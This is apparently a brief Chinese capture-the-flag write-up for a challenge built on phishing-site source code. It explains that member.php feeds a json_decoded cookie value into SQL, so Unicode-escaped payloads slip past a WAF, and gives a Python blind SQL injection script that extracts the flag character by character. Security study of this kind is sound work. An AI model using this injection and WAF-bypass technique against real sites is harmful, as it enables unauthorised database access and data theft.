打开首页就跳转到了QQ空间。www.zip得到源码。之前渗透过几个钓鱼站。用的也是这套源码。
这里就直接讲漏洞点了。不具体分析
safe.php。是一些安全函数
member.php。会从cookie['admin_user']中获取值。然后json_decode带入sql语句
由于json_decode。会解析unicode编码的数据。所以。我们可以讲payload Unicode编码。可以过WAF。然后在json_decode解析变成正常的字符串。带入sql语句
以下是我的payload
import requests
url='http://7960558c-b963-4a14-8882-c7cb525e7af8.node3.buuoj.cn/include/common.php'
def unicode(s):
Char=''
for i in s:
Char+=r'\u00'+hex(ord(i))[2:]
return Char
r=requests.session()
for a in range(1,100):
for b in range(30,130):
payload=unicode("'||(ascii(substr((select group_concat(f44ag) from fl2222g),"+str(a)+",1))="+str(b)+")&&'1")
cookie={"islogin":"1","login_data":"{\"admin_user\":\""+payload+"\"}"}
result=r.get(url=url,cookies=cookie).headers["Set-Cookie"]
if result.count('islogin')==1:
print(chr(b))
break